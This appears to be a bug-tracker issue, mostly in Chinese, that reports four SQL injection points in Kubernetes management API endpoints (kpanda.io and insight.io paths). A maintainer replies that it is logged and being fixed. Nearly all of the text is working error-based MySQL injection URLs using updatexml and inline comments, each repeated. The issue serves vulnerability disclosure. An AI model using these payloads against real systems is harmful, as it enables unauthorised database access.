Open dwx007 opened 11 months ago
SQL注入漏洞: (1)第一处: /apis/kpanda.io/v1alpha1/asl/namespaces?cluster=t-k8scloud-ywcluster01')/**/AND/**/updatexml(1,concat(0x7e,(SELECT/**/database()),0x7e),1)/**/AND/**/('bUxB'='bUxB&page=1&pageSize=10&sortBy=created_at&sortDir=desc
/apis/kpanda.io/v1alpha1/asl/namespaces?cluster=t-k8scloud-ywcluster01')/**/AND/**/updatexml(1,concat(0x7e,(SELECT/**/database()),0x7e),1)/**/AND/**/('bUxB'='bUxB&page=1&pageSize=10&sortBy=created_at&sortDir=desc
(2)第二处: /apis/insight.io/v1alpha1/clusters/kpanda-global-cluster/deployments?namespace=default')/**/AND/**/updatexml(1,concat(0x7e,(SELECT/**/database()),0x7e),1)/**/AND/**/('bUxB'='bUxB&page=1&pageSize=-1
/apis/insight.io/v1alpha1/clusters/kpanda-global-cluster/deployments?namespace=default')/**/AND/**/updatexml(1,concat(0x7e,(SELECT/**/database()),0x7e),1)/**/AND/**/('bUxB'='bUxB&page=1&pageSize=-1
(3)第三处: /apis/insight.io/v1alpha1/clusters/t-k8scloud-ywcluster01/jobs?name=insight-agent-opentelemetry-operator-68b66c65d-g4v9t&namespace=insight-system')/**/AND/**/updatexml(1,concat(0x7e,(SELECT/**/database()),0x7e),1)/**/AND/**/('bUxB'='bUxB&page=1&pageSize=10
/apis/insight.io/v1alpha1/clusters/t-k8scloud-ywcluster01/jobs?name=insight-agent-opentelemetry-operator-68b66c65d-g4v9t&namespace=insight-system')/**/AND/**/updatexml(1,concat(0x7e,(SELECT/**/database()),0x7e),1)/**/AND/**/('bUxB'='bUxB&page=1&pageSize=10
(4)第四处: /apis/insight.io/v1alpha1/clusters/t-k8scloud-ywcluster01/daemonsets?namespace=insight-system')/**/AND/**/updatexml(1,concat(0x7e,(SELECT/**/database()),0x7e),1)/**/AND/**/('bUxB'='bUxB&name=insight-agent-opentelemetry-operator-68b66c65d-g4v9t&page=1&pageSize=10
/apis/insight.io/v1alpha1/clusters/t-k8scloud-ywcluster01/daemonsets?namespace=insight-system')/**/AND/**/updatexml(1,concat(0x7e,(SELECT/**/database()),0x7e),1)/**/AND/**/('bUxB'='bUxB&name=insight-agent-opentelemetry-operator-68b66c65d-g4v9t&page=1&pageSize=10
已记录,在修复了
windsonsea
commented
11 months ago windsonsea
commented
11 months ago
SQL注入漏洞: (1)第一处:
/apis/kpanda.io/v1alpha1/asl/namespaces?cluster=t-k8scloud-ywcluster01')/**/AND/**/updatexml(1,concat(0x7e,(SELECT/**/database()),0x7e),1)/**/AND/**/('bUxB'='bUxB&page=1&pageSize=10&sortBy=created_at&sortDir=desc(2)第二处:
/apis/insight.io/v1alpha1/clusters/kpanda-global-cluster/deployments?namespace=default')/**/AND/**/updatexml(1,concat(0x7e,(SELECT/**/database()),0x7e),1)/**/AND/**/('bUxB'='bUxB&page=1&pageSize=-1(3)第三处:
/apis/insight.io/v1alpha1/clusters/t-k8scloud-ywcluster01/jobs?name=insight-agent-opentelemetry-operator-68b66c65d-g4v9t&namespace=insight-system')/**/AND/**/updatexml(1,concat(0x7e,(SELECT/**/database()),0x7e),1)/**/AND/**/('bUxB'='bUxB&page=1&pageSize=10(4)第四处:
/apis/insight.io/v1alpha1/clusters/t-k8scloud-ywcluster01/daemonsets?namespace=insight-system')/**/AND/**/updatexml(1,concat(0x7e,(SELECT/**/database()),0x7e),1)/**/AND/**/('bUxB'='bUxB&name=insight-agent-opentelemetry-operator-68b66c65d-g4v9t&page=1&pageSize=10